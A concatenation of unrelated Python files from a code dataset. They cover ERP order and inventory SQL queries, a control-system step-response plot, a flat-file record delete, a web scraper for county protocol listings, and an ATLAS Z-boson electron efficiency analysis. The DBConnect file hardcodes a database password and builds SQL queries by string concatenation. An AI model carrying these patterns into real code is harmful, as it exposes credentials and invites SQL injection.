translate = {}\n\n def __init__(self):\n ##create connection to DB\n connection = connect(dsn='live', uid='sysprogress', pwd='123')\n self.cursor = connection.cursor()\n #return self.cursor\n\n def setdb(self, db):\n self.db = db\n\n def setfields(self, fields):\n self.fields = fields\n\n def setfix(self, fix):\n self.fix = fix\n\n def settranslate(self, translate):\n self.translate = translate\n\n def DBGet(self, select):\n #def odbcSelect(cursor, select):\n self.cursor.execute(select)\n return self.cursor\n\n selname = {'cono': 'Company', 'whse': 'Whse', 'name': 'MFG', 'prod': 'Product', 'descrip': 'Description', 'qtyavail': 'Avalable', 'qtyonhand': 'OnHand',\n 'qtyreservd': 'qtyReserved', 'qtycommit': 'qtyCommit', 'qtybo': 'qtyBO', 'qtyintrans': 'qtyInTransit', 'qtyonorder': 'qtyOnOrder', 'safeallamt': 'safeallamt', 'orderpt': 'orderpt', 'linept': 'linept', 'lastcost': 'lastcost', 'baseprice': 'baseprice',\n 'addoncost': 'AddOnCost', 'transdt': 'transdt', 'lastpowtdt': 'lastpowtdt', 'shipprod': 'Product', 'transtype': 'Order Type', 'qtyord': 'QtyOrd', 'DlrAmt$': 'Amount', 'orderno': 'Order',\n 'enterdt': 'entDate', 'custpo': 'PO#', 'totlineord': 'Total Order', 'totqtyord': 'QtyTotal', 'totweight': 'totWeight'}\n #'lastrcptdt', 'lastcntdt', 'leadtmavg'}\n\n def __namesDic(self, sel):\n sel = sel.replace(\"SELECT \", \"\")\n DBnames = sel.split(',')\n for x in range(len(DBnames)):\n if 'AS ' in DBnames[x]:\n discard, DBnames[x] = DBnames[x].split('AS ')\n DBnames[x] = DBnames[x].replace(\"'\", '')\n DBnames[x] = DBnames[x].replace(\" \", '')\n else:\n discard, DBnames[x] = DBnames[x].split('.', 1)\n DBnames[x] = DBnames[x].replace(\" \", '')\n #print(DBnames)\n FriendlyNames = self.__namesTanslate(DBnames)\n return FriendlyNames\n \n def __namesTanslate(self, DBnames):\n for x in range(len(DBnames)):\n if DBnames[x] in self.selname:\n DBnames[x] = self.selname[DBnames[x]]\n #else:\n # DBnames[x] = \"No Name Match\"\n #print(DBnames)\n return DBnames\n\n\n#New method\n def __fix(self, row):\n fix = self.fix\n for r in fix:\n if fix[r] == \"date\":\n row[r] = ttp.mmddyyyy(row[r])\n elif fix[r] == 
\"upper\":\n toupper = row[r]\n row[r] = toupper.upper()\n #int, float\n return row\n\n def __translate(self, row):\n translate = self.translate\n for name in translate:\n if row[name] in translate[name]:\n row[name] = translate[name][row[name]]\n return row\n \n def __getrecords(self):\n db = self.db\n fields = self.fields\n select = (db[\"odbcselect\"] + db[\"odbcfrom\"] + db[\"odbcwhere\"] + db[\"odbcorder\"])\n c = self.cursor.execute(select)\n count = 0\n data = []\n for row in c:\n #print(row)\n itemno = 0\n rowd = {}\n for name in fields[\"names\"]:\n rowd[fields[\"names\"][name]] = row[itemno]\n itemno += 1\n #if 'fix' in db:\n if bool(self.fix):\n rowd = self.__fix(rowd) #fix the data format\n if bool(self.translate):\n rowd = self.__translate(rowd) #translate the data as needed\n #print(rowf)\n data.append(rowd)\n count += 1\n return data #array of dics\n\n ordhdrData = {}\n def getrecords(self):\n data = self.__getrecords()\n return data\n\n#Old Crap needs to convert\n\n ordersData = {}\n def orders(self):\n odbcsel = \"SELECT arsc_0.name, oeeh_0.enterdt, oeeh_0.orderno, oeeh_0.transtype, oeeh_0.custpo, oeeh_0.totlineord, oeeh_0.totqtyord, oeeh_0.totweight \"\n odbcfrom = \"FROM NXT.PUB.arsc arsc_0, NXT.PUB.oeeh oeeh_0 \"\n odbcwhere = \"WHERE arsc_0.custno = oeeh_0.custno AND arsc_0.cono = oeeh_0.cono AND ((oeeh_0.stagecd<9) AND (oeeh_0.orderno>\" + self.orderstart + \")) \"\n odbcorder = \"ORDER BY arsc_0.name, oeeh_0.enterdt, oeeh_0.orderno\"\n select = odbcsel + odbcfrom + odbcwhere + odbcorder\n names = self.__namesDic(odbcsel)\n oData = {}\n \"\"\"\n oData(order by cust) = {Cust{\n orderno: [date, order type, PO#, orderttl, quantyttl, weightttl]\n }\n }\n \"\"\"\n orderNumbers = []\n daterange = []\n c = self.cursor.execute(select)\n count = 0\n hashit = {}\n for row in c:\n # Company,1 Date,2 Order Number,3 Order Type,4 Purchase Order Number,5 $ For order,6 Quantity Total,7 Weight Total,8\n #create array to add to dic\n line = []\n orderNumbers.append(row[2])\n toupper = row[3]\n row[3] = toupper.upper()\n oDate = row[1]\n daterange.append(oDate)\n row[1] = ttp.mmddyyyy(oDate)\n line = (row[1], row[3], row[4], row[5], row[6], float(row[7]))\n #build dic of dic of dic of dic, it just goes on and on\n if not row[0] in oData:\n oData[row[0]] = {}\n if not row[2] in oData[row[0]]:\n oData[row[0]][row[2]] = {}\n oData[row[0]][row[2]] = line\n hashit[count] = {}\n for x in range(len(row)):\n hashit[count][names[x]] = row[x]\n count += 1\n #print(hashit)\n #get last order#\n orderNumbers.sort()\n self.orderend = orderNumbers[-1]\n self.orderstotal = len(orderNumbers)\n maxd = max(daterange)\n self.datemax = maxd\n mind = min(daterange)\n self.datemin = mind\n\n orderNumbers.sort()\n stuff = {}\n #print(orderNumbers)\n stuff['orderstart'] = orderNumbers[0]\n stuff['orderend'] = orderNumbers[-1]\n stuff['orderstotal'] = len(orderNumbers)\n maxd = max(daterange)\n stuff['datemax'] = maxd\n mind = min(daterange)\n stuff['datemin'] = mind\n stuff['count'] = count\n self.ordersData['info'] = stuff\n self.ordersData['data'] = oData\n #return oData\n\n backordersData = {}\n def backorders(self):\n select = \"SELECT arsc_0.name, oeeh_0.enterdt, oeeh_0.orderno, oeeh_0.transtype, oeeh_0.custpo, oeeh_0.totlineord, oeeh_0.totqtyord, oeeh_0.totweight, oeeh_0.stagecd, oeeh_0.ordersuf, oeeh_0.shiptonm, oeeh_0.reqshipdt, oeeh_0.promisedt \" \\\n \"FROM NXT.PUB.arsc arsc_0, NXT.PUB.oeeh oeeh_0 \" \\\n \"WHERE arsc_0.custno = oeeh_0.custno AND arsc_0.cono = oeeh_0.cono AND ((oeeh_0.stagecd<4) AND 
(oeeh_0.ordersuf>0)) \" \\\n \"ORDER BY arsc_0.name, oeeh_0.enterdt, oeeh_0.orderno\"\n data = {}\n datax = {}\n \"\"\"\n oData(order by cust) = {Cust:{\n date:{ order: [ordersuf, type, PO#, orderttl, quantyttl, weightttl]\n }\n }\n \"\"\"\n #datax['header'] = ['Company:30', 'Date:11', 'OrderNo:9', 'Suffix:6', 'Order Type:10', 'PO#:20', 'OrderTotal:11', 'QtyTotal:8', 'WgtTotal:9']\n #datax['name'] = 'Backorders'\n #datax['freeze'] = 0\n orderNumbers = []\n daterange = []\n count = 0\n c = self.cursor.execute(select)\n for row in c:\n #print(row)\n count += 1\n line = []\n orderNumbers.append(row[2])\n toupper = row[3]\n row[3] = toupper.upper()\n oDate = row[1]\n daterange.append(oDate)\n row[1] = ttp.mmddyyyy(oDate)\n line = (row[9], row[3], row[4], row[5], row[6], row[7])\n #build dic of dic of dic of dic, it just goes on and on\n if not row[0] in data:\n data[row[0]] = {}\n if not row[1] in data[row[0]]:\n data[row[0]][row[1]] = {}\n data[row[0]][row[1]][row[2]] = line\n #biuld info\n orderNumbers.sort()\n stuff = {}\n stuff['orderstart'] = orderNumbers[0]\n stuff['orderend'] = orderNumbers[-1]\n stuff['orderstotal'] = len(orderNumbers)\n maxd = max(daterange)\n stuff['datemax'] = maxd\n mind = min(daterange)\n stuff['datemin'] = mind\n stuff['count'] = count\n datax['info'] = stuff\n datax['data'] = data\n return datax\n\n openUninvoicedOrdersData = {}\n def openUninvoicedOrders(self):\n select = \"SELECT arsc_0.name, oeeh_0.enterdt, oeeh_0.orderno, oeeh_0.transtype, oeeh_0.custpo, oeeh_0.totlineord, oeeh_0.totqtyord, oeeh_0.totweight, oeeh_0.stagecd, oeeh_0.shiptonm, oeeh_0.ordersuf, oeeh_0.reqshipdt, oeeh_0.promisedt \" \\\n \"FROM NXT.PUB.arsc arsc_0, NXT.PUB.oeeh oeeh_0 \" \\\n \"WHERE arsc_0.custno = oeeh_0.custno AND arsc_0.cono = oeeh_0.cono AND ((oeeh_0.stagecd < 4 )) \" \\\n \"ORDER BY oeeh_0.stagecd, arsc_0.name, oeeh_0.enterdt, oeeh_0.orderno\"\n oData = {}\n \"\"\"\n oData(order by cust) = {Cust:{\n date:{order: [type, PO#, orderttl, quantyttl, weightttl, stage, ordersuf, shiptonm]\n }\n }\n \"\"\"\n self.openUninvoicedOrdersData['header'] = ['Company:30', 'Date:11', 'OrderNo:9', 'Suffix:9', 'Order Type:10', 'Stage:12', 'ShiptoNM:35', 'PO#:20', 'OrderTotal:11', 'qtyTotal:8', 'WtTotal:9', \"ReqShipDT:11\", \"PromiseDT:11\"]\n self.openUninvoicedOrdersData['name'] = 'openUninvoicedOrders'\n self.openUninvoicedOrdersData['freeze'] = 0\n orderNumbers = []\n daterange = []\n count = 0\n stage = { 0: 'Quote',\n 1: 'Ordered',\n 2: 'Picked',\n 3: 'Shipped',\n 4: 'Invoiced'}\n c = self.cursor.execute(select)\n for row in c:\n count += 1\n line = []\n orderNumbers.append(row[2])\n toupper = row[3]\n row[3] = toupper.upper()\n oDate = row[1]\n daterange.append(oDate)\n row[1] = ttp.mmddyyyy(oDate)\n row[8] = stage[row[8]] \n row[11] = ttp.mmddyyyy(row[11])\n row[12] = ttp.mmddyyyy(row[12])\n line = (row[1], row[9], row[10], row[3], row[8], row[4], row[5], row[6], row[7], row[11], row[12])\n #build dic of dic of dic of dic, it just goes on and on\n if not row[0] in oData:\n oData[row[0]] = {}\n if not row[1] in oData[row[0]]:\n oData[row[0]][row[1]] = {}\n oData[row[0]][row[1]][row[2]] = line\n #biuld info\n orderNumbers.sort()\n stuff = {}\n stuff['orderstart'] = orderNumbers[0]\n stuff['orderend'] = orderNumbers[-1]\n stuff['orderstotal'] = len(orderNumbers)\n maxd = max(daterange)\n stuff['datemax'] = maxd\n mind = min(daterange)\n stuff['datemin'] = mind\n stuff['count'] = count\n self.openUninvoicedOrdersData['info'] = stuff\n self.openUninvoicedOrdersData['data'] = oData\n\n 
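The repeated "if not key in dict: dict[key] = {}" guards used by backorders() and openUninvoicedOrders() above can be collapsed with collections.defaultdict. A standalone sketch of the same nesting; the sample values are placeholders, not real order data:

from collections import defaultdict

def nested_dict():
    # arbitrarily deep dict-of-dicts, levels created on first access
    return defaultdict(nested_dict)

data = nested_dict()
# equivalent to the three guarded assignments in backorders():
data['ACME Supply']['01/02/2020'][123456] = ('00', 'SO', 'PO-9', 150.0, 4, 2.5)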
customerProductData = {}\n def customerProduct(self):\n odbcsel = \"SELECT oeel_0.whse, oeel_0.transtype, arsc_0.name, oeel_0.shipprod, oeel_0.qtyord, oeel_0.qtyord*oeel_0.price AS 'DlrAmt$', oeel_0.orderno \"\n #odbcfrom = \"FROM NXT.PUB.arsc arsc_0, NXT.PUB.oeel oeel_0 \"\n #odbcwhere = \"WHERE arsc_0.custno = oeel_0.custno AND arsc_0.cono = oeel_0.cono AND ((oeel_0.orderno>\" + self.orderstart + \")) \"\n #odbcorder = \"ORDER BY oeel_0.whse, oeel_0.transtype, arsc_0.name, oeel_0.shipprod\"\n\n\n #odbcsel = \"SELECT oeel_0.whse, oeeh_0.stagecd, oeel_0.transtype, oeel_0.orderno, oeel_0.ordersuf, arsc_0.name, oeel_0.shipprod, oeel_0.qtyord, oeel_0.qtyord*oeel_0.price AS 'DlrAmt$' \"\"\n odbcfrom = \"FROM NXT.PUB.arsc arsc_0, NXT.PUB.oeeh oeeh_0, NXT.PUB.oeel oeel_0 \"\n odbcwhere = \"WHERE oeeh_0.orderno = oeel_0.orderno AND oeeh_0.ordersuf = oeel_0.ordersuf AND oeeh_0.custno = arsc_0.custno AND oeel_0.custno = oeeh_0.custno AND ((oeel_0.orderno>\" + self.orderstart + \") AND (oeeh_0.stagecd<9)) \"\n odbcorder = \"ORDER BY oeel_0.whse, oeel_0.transtype, arsc_0.name, oeel_0.shipprod\"\n select = odbcsel + odbcfrom + odbcwhere + odbcorder\n names = self.__namesDic(odbcsel)\n cData = {}\n \"\"\"\n cData(order summary) = {Whse{\n Type{\n Customer{\n prod: enterdt: [qtyord, price] \n }\n }\n }\n }\n \"\"\"\n #orderNumbers = []\n #daterange = []\n count = 0\n c = self.cursor.execute(select)\n for row in c:\n toupper = row[1]\n row[1] = toupper.upper()\n #build dic of dic of dic of dic, it just goes on and on\n #whse\n if not row[0] in cData:\n cData[row[0]] = {}\n #type \n if not row[1] in cData[row[0]]: \n cData[row[0]][row[1]] = {}\n #customer\n if not row[2] in cData[row[0]][row[1]]: \n cData[row[0]][row[1]][row[2]] = {}\n #shipprod\n if not row[3] in cData[row[0]][row[1]][row[2]]: \n cData[row[0]][row[1]][row[2]][row[3]] = {}\n cData[row[0]][row[1]][row[2]][row[3]] = [int(row[4]), float(row[5])]\n else:\n cData[row[0]][row[1]][row[2]][row[3]][0] += int(row[4])\n cData[row[0]][row[1]][row[2]][row[3]][1] += float(row[5])\n count += 1\n #orderNumbers.sort()\n stuff = {}\n #print(orderNumbers)\n #stuff['orderstart'] = orderNumbers[0]\n #stuff['orderend'] = orderNumbers[-1]\n #stuff['orderstotal'] = len(orderNumbers)\n #maxd = max(daterange)\n #stuff['datemax'] = maxd\n #mind = min(daterange)\n #stuff['datemin'] = mind\n stuff['count'] = count\n self.customerProductData['info'] = stuff\n self.customerProductData['data'] = cData\n #return cData\n\n productData = {}\n def product(self):\n odbcsel = \"SELECT oeel_0.whse, oeel_0.shipprod, oeel_0.qtyord, oeel_0.qtyord*oeel_0.price AS 'DlrAmt$' \" \n #other = \"FROM NXT.PUB.arsc arsc_0, NXT.PUB.oeel oeel_0 \"\n #where = \"WHERE arsc_0.custno = oeel_0.custno AND arsc_0.cono = oeel_0.cono AND ((oeel_0.orderno>\" + self.orderstart + \")) \"\n order = \"ORDER BY oeel_0.whse, oeel_0.transtype, arsc_0.name, oeel_0.shipprod\"\n sfrom = \"FROM NXT.PUB.arsc arsc_0, NXT.PUB.oeeh oeeh_0, NXT.PUB.oeel oeel_0 \"\n #sfrom = \"FROM NXT.PUB.icsw icsw_0, NXT.PUB.apsv apsv_0, NXT.PUB.arsc arsc_0, NXT.PUB.oeeh oeeh_0, NXT.PUB.oeel oeel_0 \"\n where = \"WHERE oeeh_0.orderno = oeel_0.orderno AND oeeh_0.ordersuf = oeel_0.ordersuf AND oeeh_0.custno = arsc_0.custno AND oeel_0.custno = oeeh_0.custno AND ((oeel_0.orderno>\" + self.orderstart + \") AND (oeeh_0.stagecd<9)) \"\n select = odbcsel + sfrom + where + order\n names = self.__namesDic(odbcsel)\n \"\"\" dic Format\n sData(order summary) = {whse:\n prod: [qtyord-2, amount-3]\n }\n \"\"\"\n data = {}\n c = 
self.cursor.execute(select)\n for row in c:\n row[2] = int(row[2])\n #whse\n if not row[0] in data:\n data[row[0]] = {}\n #prod \n if not row[1] in data[row[0]]: \n data[row[0]][row[1]] = [int(row[2]), float(row[3])]\n else:\n data[row[0]][row[1]][0] += int(row[2])\n data[row[0]][row[1]][1] += float(row[3])\n self.productData = data\n\n productInv = {}\n\n def getproductinv(self):\n odbcsel = \"SELECT icsw_0.cono, icsw_0.whse, apsv_0.name, icsw_0.prod, icsp_0.descrip, icsw_0.qtyonhand-icsw_0.qtyreservd-icsw_0.qtycommit AS ' qtyavail ', icsw_0.qtyonhand, \" \\\n \" icsw_0.qtyreservd, icsw_0.qtycommit, icsw_0.qtybo, icsw_0.qtyintrans, icsw_0.qtyonorder, icsw_0.safeallamt, icsw_0.orderpt, icsw_0.linept, icsw_0.lastcost, icsw_0.baseprice,\" \\\n \" icsw_0.addoncost, icsw_0.transdt, icsw_0.lastpowtdt, icsw_0.lastrcptdt, icsw_0.lastcntdt, icsw_0.leadtmavg \"\n names = self.__namesDic(odbcsel)\n c = self.cursor.execute( odbcsel +\"FROM NXT.PUB.apsv apsv_0, NXT.PUB.icsp icsp_0, NXT.PUB.icsw icsw_0 WHERE icsw_0.arpvendno = apsv_0.vendno AND icsw_0.prod = icsp_0.prod AND ((icsw_0.cono = 10)) AND ((icsw_0.whse = 10)) AND ((apsv_0.cono = 10)) ORDER BY icsw_0.cono, icsw_0.whse, apsv_0.name, icsw_0.prod\")\n #\"FROM NXT.PUB.apsv apsv_0, NXT.PUB.icsp icsp_0, NXT.PUB.icsw icsw_0 WHERE icsw_0.arpvendno = apsv_0.vendno AND icsw_0.prod = icsp_0.prod ORDER BY icsw_0.cono, icsw_0.whse, apsv_0.name, icsw_0.prod\")\n self.productInv['header'] = [\"cono\", \"whse\", \"MFG\", \"Product\", \"descrip\", \"qtyavail\", \"qtyonhand\",\n \"qtyreservd\", \"qtycommit\", \"qtybo\", \"qtyintrans\", \"qtyonorder\", \"safeallamt\", \"orderpt\", \"linept\", \"lastcost\", \"baseprice\",\n \"addoncost\", \"transdt\", \"lastpowtdt\", \"lastrcptdt\", \"lastcntdt\", \"leadtmavg\"]\n for row in c:\n #remove \";\" from description\n row[4] = row[4].replace(';',' ')\n #change avalable to int\n row[5] = int(float(row[5]))\n row[15] = float(row[15])\n row[16] = float(row[16])\n row[17] = float(row[17])\n #date format\n row[18] = ttp.mmddyyyy(row[18])\n row[19] = ttp.mmddyyyy(row[19])\n row[20] = ttp.mmddyyyy(row[20])\n row[21] = ttp.mmddyyyy(row[21])\n self.productInv[row[3]] = row\n nominalusage = {}\n \"\"\" dic Format\n {cono-0:\n whse-1:\n prod-2: [lastmergedt-3, normusage-4]\n }\n \"\"\"\n def getnominalusage(self):\n #get nomusage and put into dic nomusage\n c = self.cursor.execute(\"SELECT icswu_0.cono, icswu_0.whse, icswu_0.prod, icswu_0.lastmergedt, icswu_0.normusage FROM NXT.PUB.icswu icswu_0\")\n for row in c:\n #create array to add to dic\n line = []\n #add last nomusage date\n tDate = row[3]\n if tDate != None:\n row[3] = tDate.strftime('%m/%d/%Y')\n line = (row[3], row[4])\n #build dic of dic\n if not row[0] in self.nominalusage:\n self.nominalusage[row[0]] = {}\n if not row[1] in self.nominalusage[row[0]]:\n self.nominalusage[row[0]][row[1]] = {}\n self.nominalusage[row[0]][row[1]][row[2]]=line\n\n #def __daterange(self, datelist):\n # self.datemax = max(datelist)\n # self,datemin = min(datelist)","sub_path":"DBConnect.py","file_name":"DBConnect.py","file_ext":"py","file_size_in_byte":19252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"221749417","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport control\n\n\nplt.figure(1)\ndata = pd.read_csv('Vel0 - lazo abierto.txt',sep='\\s+',header=None)\nplt.plot(data)\nplt.title('Velocidad vs Tiempo - Caso Lazo Abierto' )\nplt.xlabel('Tiempo (20 ms)')\nplt.ylabel('Velocidad 
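Several DBConnect methods above route dates through ttp.mmddyyyy(), which is imported but not shown in this record. A plausible minimal implementation, inferred from the call sites (the name and the None handling are assumptions):

import datetime

def mmddyyyy(value):
    """Format a date/datetime as MM/DD/YYYY; pass None through unchanged."""
    if value is None:
        return None
    if isinstance(value, (datetime.date, datetime.datetime)):
        return value.strftime('%m/%d/%Y')
    return str(value)  # already formatted or unexpected type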
(RPM)')\n\nplt.figure(2)\nkp=1\nT=np.arange(0,50,0.01)\n\nnum=[1] # numerator polynomial coefficients\nden = [1,1,1] # denominator polynomial coefficients (second-order system)\nH=control.TransferFunction(num,den) # transfer function from the polynomial coefficients (num, den)\nt,yout=control.step_response(H,T) # evaluate the step response over the time range\n\nplt.plot(t,yout)\n\nplt.grid(True)\nplt.axis([0,50,0,1.5]) # set the axis limits\nplt.title(\"Respuesta al escalon\", loc='center') # set the plot title\nplt.xlabel(\"Tiempo (s)\");plt.ylabel(\"Salida y(t)\") # label the axes\n\nplt.show()\n","sub_path":"Control_Sistemas/pp0/pp0-lazo_abierto.py","file_name":"pp0-lazo_abierto.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"57902366","text":"import sys\nfrom .record_core import process_line3, query_results, get_table, file_writer\nfrom ..file_io.locking import temp_path_from_file\nimport tempfile\n\ndef method_delete(context, meta):\n meta.table=get_table(context,meta)\n\n line_number = 1\n affected_rows = 0\n # if autocommit... create a temp copy every time\n # if batch transaction, make 1 copy, always pull from that\n temp_data_file=context.get_data_file(meta.table)\n diff=[]\n\n column_count =meta.table.column_count()\n delimiter =meta.table.delimiters.field\n visible_whitespace=meta.table.visible.whitespace\n visible_comments =meta.table.visible.comments\n visible_errors =meta.table.visible.errors\n \n content_file=open(temp_data_file, 'r')\n try:\n dst_temp_filename=temp_path_from_file(meta.table.data.path,\"ddb_DST_DELETE\",unique=True)\n temp_file=file_writer(dst_temp_filename,'w')\n try:\n for line in content_file:\n processed_line = process_line3(context,meta, line, line_number,column_count,delimiter,visible_whitespace,visible_comments, visible_errors)\n if processed_line['error'] is not None:\n context.add_error(processed_line['error'])\n line_number += 1\n # skip matches\n if processed_line['match']:\n affected_rows += 1\n diff.append(\"Deleted Line: {0}, {1}\".format(line_number-1,line))\n continue\n \n temp_file.write(processed_line['raw'])\n temp_file.write(meta.table.delimiters.get_new_line())\n finally:\n temp_file.close()\n finally:\n content_file.close()\n \n context.autocommit_write(meta.table,dst_temp_filename)\n context.auto_commit(meta.table)\n return query_results(success=True,affected_rows=affected_rows,diff=diff)\n","sub_path":"builds/ddb3cython/ddb3cython/methods/record_delete.py","file_name":"record_delete.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"472620333","text":"from bs4 import BeautifulSoup\nimport requests\nimport math\nfrom urllib import parse as urlparse\nfrom fieldnames import *\n\ndef parseMain(primaryLink):\n session = requests.Session()\n response = session.get(primaryLink)\n soup = BeautifulSoup(response.text, \"lxml\")\n pageButtons = soup.find_all(\"p\", {\"class\": \"pageButton\"})\n lastPage = pageButtons[-1]\n lastUrl = lastPage.find(\"a\").get(\"href\")\n fullLastUrl = urlparse.urljoin(primaryLink, lastUrl)\n parseResult = urlparse.urlparse(fullLastUrl)\n qs = urlparse.parse_qs(parseResult.query)\n maxPages = int(qs[\"paging\"][0])\n del qs[\"paging\"]\n parseWithFormat = parseResult._replace(query=urlparse.urlencode(qs))\n unparsed = urlparse.urlunparse(parseWithFormat)\n unparsed += 
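method_delete() above follows a write-to-temp-then-commit pattern using project helpers (temp_path_from_file, file_writer, autocommit_write). The same idea expressed with only the standard library, as a self-contained sketch (rewrite_without_matches and keep_line are illustrative names, not part of the original module):

import os
import tempfile

def rewrite_without_matches(path, keep_line):
    """Rewrite a text file, dropping lines rejected by keep_line()."""
    dir_ = os.path.dirname(os.path.abspath(path))
    fd, tmp = tempfile.mkstemp(dir=dir_, prefix='.rewrite_')
    removed = 0
    with os.fdopen(fd, 'w') as out, open(path) as src:
        for line in src:
            if keep_line(line):
                out.write(line)
            else:
                removed += 1
    os.replace(tmp, path)  # atomic swap on POSIX and Windows
    return removed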
\"&paging={}\"\n return session, unparsed, maxPages\n\ndef parseLocations(session, link):\n '''\n This gets the locations on one page of the website.\n type link: str\n rtype: [{str}]\n '''\n response = session.get(link)\n data = response.text\n soup = BeautifulSoup(data, \"lxml\")\n\n # get container for location data\n locationsContainer = soup.find(\"div\", {\"class\": \"item-container\"})\n\n locations = []\n\n for locationTag in locationsContainer.find_all(\"div\", {\"class\": \"normal-text list-item\"}):\n # location will store location name, phone number, and address\n location = {}\n\n locationNameTags = locationTag.find_all(\"div\", {\"class\": \"text-left font-weight-bold\"})\n\n # add location names to locations object\n # some locations have two lines\n location[NAME1] = locationNameTags[0].get_text(strip=True)\n if len(locationNameTags) > 1: location[NAME2] = locationNameTags[1].get_text(strip=True)\n \n locationDataTags = locationTag.find(\"div\", {\"class\": \"text-left main-info\"})\n\n locationDataDivs = locationDataTags.findChild().find_all(\"div\")\n #if len(locationDataDivs) > 0: location[PHONE] = locationDataDivs[0].get_text(strip=True)\n if len(locationDataDivs) > 1: location[ADDR1] = locationDataDivs[1].get_text(strip=True)\n if len(locationDataDivs) > 2: location[ADDR2] = locationDataDivs[2].get_text(strip=True)\n \n location[CATEGORY] = locationDataTags.find(\"div\", {\"class\": \"extra-info\"}).get_text(strip=True)\n \n infoDataTags = locationTag.find(\"div\", {\"class\": \"info-column\"})\n \n pdf = infoDataTags.find(\"a\", {\"class\": \"download-button\"}).get(\"href\").replace(' ', '%20')\n urlbase = 'https://saesdp.sccgov.org/sdpdocs/'\n assert pdf.startswith(urlbase) and '-' in pdf, pdf\n location[PDF] = pdf\n location['id'] = int(pdf[len(urlbase):pdf.find('-', len(urlbase))])\n \n extraInfoTags = infoDataTags.find(\"div\", {\"class\": \"extra-info\"})\n \n location[REPLACEMENT] = extraInfoTags.find(\"div\").get_text(strip=True)\n dateText = extraInfoTags.find(\"div\", {\"class\": \"text-right\"}).get_text(strip=True)\n if dateText.startswith(\"Date of Protocol Submission: \"):\n location[DATE] = dateText[len(\"Date of Protocol Submission: \"):]\n else:\n location[DATE] = dateText\n\n # store location in list locations\n locations.append(location)\n \n return locations\n\n","sub_path":"social_distance_spider.py","file_name":"social_distance_spider.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"497292197","text":"import argparse\nfrom math import atan, cos, exp, sin, sinh\nimport os\nimport sys\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport ROOT\n\nfrom various import dot, norm\n\n\n\n# Some ROOT global settings and styling\nROOT.TH1.SetDefaultSumw2()\n\n# load file and set up ID\nfile_path = '/Users/meister/Documents/ATLAS Open Data/DataEgamma.root'\n# file_path = '/Users/meister/Documents/ATLAS Open Data/mc_147770.Zee.root'\ntfile = ROOT.TFile(file_path)\nID = tfile.GetName().split('.')[-2].split('/')[-1]\nprint('Openend file {}'.format(file_path))\n\n# load the tree containing all the variables\ntree = ROOT.gDirectory.Get('mini')\n\n# set up output file\noutfile = ROOT.TFile.Open(\n '../root_files/efficiencies_{}'.format(file_path.split('/')[-1]), 'RECREATE')\noutfile.cd()\n\n# book histograms within the output file\nhistogram_probe_pT_before_selection = ROOT.TH1D(\n 'pT_before_selection',\n ' ; pT [MeV / c]; Entries', 120, 0, 
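parseMain() above returns a session, a URL template ending in "&paging={}", and the highest page number. Presumably the caller iterates the pages roughly like this (scrape_all is an illustrative name, not part of the original file):

def scrape_all(primaryLink):
    session, url_template, max_pages = parseMain(primaryLink)
    locations = []
    for page in range(1, max_pages + 1):
        locations.extend(parseLocations(session, url_template.format(page)))
    return locations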
120000\n)\nhistogram_probe_pT_after_selection = ROOT.TH1D(\n 'pT_after_selection',\n ' ; pT [MeV / c]; Entries', 120, 0, 120000\n)\nhistogram_ratio = ROOT.TH1D(\n 'ratio',\n ' ; pT [MeV / c] Entries', 120, 0, 120000\n)\n\n\ndef valid_electron(tree, electron_id):\n # trigger electrons\n if not tree.trigE:\n return False\n\n # good run list\n if not tree.passGRL:\n return False\n\n # found vertex\n if not tree.hasGoodVertex:\n return False\n\n # particle data group identifiers (e+ or e-)\n typ = tree.lep_type\n if not (abs(typ[1]) == abs(typ[0]) == 11):\n return False\n\n # charge (+- 1 e)\n charge = tree.lep_charge\n if not (charge[0] == - charge[1]):\n return False\n\n # pT cut\n pT = tree.lep_pt\n if not (pT[electron_id] >= 25e3):\n return False\n\n # tight ID\n tightID = tree.lep_flag[electron_id]\n if not (str(bin(tightID))[-10] == '1'):\n return False\n\n # check for valid invariant mass\n φ1, φ2 = tree.lep_phi\n η1, η2 = tree.lep_eta\n E1, E2 = tree.lep_E\n m1, m2 = 0, 0\n # momenta in x-y direction\n pT1 = tree.lep_pt[0] * np.array([cos(φ1), sin(φ1), 0])\n pT2 = tree.lep_pt[1] * np.array([cos(φ2), sin(φ2), 0])\n # total momenta\n p1 = pT1 + np.array([0, 0, tree.lep_pt[0] * sinh(η1)])\n p2 = pT2 + np.array([0, 0, tree.lep_pt[1] * sinh(η2)])\n\n m_inv = (abs(m1 ** 2 + m2 ** 2 + 2 * E1 * E2 - 2 * dot(p1, p2)))**.5\n m_inv_theo = 91e3\n if not (0.8 * m_inv_theo <= m_inv <= 1.2 * m_inv_theo):\n return False\n\n return True\n\n\n# setup list containing number of valid events after each selection criterion\nvalid_events = [0] * 13\n# set event_num\nevent_num = 500000 # tree.GetEntriesFast()\n# loop over events\nfor idx in range(event_num):\n nb = tree.GetEntry(idx)\n if nb <= 0:\n continue\n\n # check if exactly two leptons were found\n if tree.lep_n != 2:\n continue\n\n # apply weights\n if ID.startswith('Z'):\n weight = tree.mcWeight\n else:\n weight = 1\n\n # check tag electron\n if valid_electron(tree, 0):\n tag_id = 0\n probe_id = 1\n #if valid_electron(tree, 1):\n # tag_id = 1\n # probe_id = 0\n else:\n continue\n\n # fill histogram before selection\n pT = tree.lep_pt\n histogram_probe_pT_before_selection.Fill(pT[probe_id], weight)\n\n # check for tight ID, fill histogram after selection\n if str(bin(tree.lep_flag[probe_id]))[-10] == '1':\n histogram_probe_pT_after_selection.Fill(pT[probe_id], weight)\n\n\nhistogram_ratio.Divide(\n histogram_probe_pT_after_selection, histogram_probe_pT_before_selection,\n 1, 1, 'B'\n)\n\n# write to outfile\noutfile.cd()\nprint('Writing output to {}'.format(outfile.GetName()))\noutfile.Write()\n\n# allows to see the plot before python finishes\nROOT.TPython.Prompt()\n\n","sub_path":"F91_Z-Boson/py/task7.py","file_name":"task7.py","file_ext":"py","file_size_in_byte":3760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} 